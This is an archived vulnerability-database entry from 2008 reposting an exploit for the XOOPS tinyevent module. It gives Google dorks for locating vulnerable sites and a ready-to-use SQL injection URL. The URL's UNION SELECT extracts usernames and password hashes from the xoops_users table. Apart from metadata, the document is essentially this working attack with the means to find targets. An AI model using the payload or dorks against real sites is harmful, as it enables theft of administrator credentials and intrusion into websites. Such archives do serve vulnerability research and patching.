XOOPS Module tinyevent-print SQL Injection(id)

2008-02-22T00:00:00
ID SECURITYVULNS:DOC:19233
Type securityvulns
Reporter Securityvulns
Modified 2008-02-22T00:00:00

Description

XOOPS Module tinyevent-print SQL Injection(id)

AUTHOR : S@BUN

HOME : http://www.milw0rm.com/author/1334

MAİL : hackturkiye.hackturkiye@gmail.com

DORK 1 : allinurl:"modules/tinyevent"

DORK 2 : exploit working all tinyevent

EXPLOIT :

modules/tinyevent/index.php?op=print&id=-0//union//select+0x3a,0x3a,0x3a,uname,pass+from/*/xoops_users/where%20admin%201%200%2066

S@BUN i AM NOT HACKER S@BUN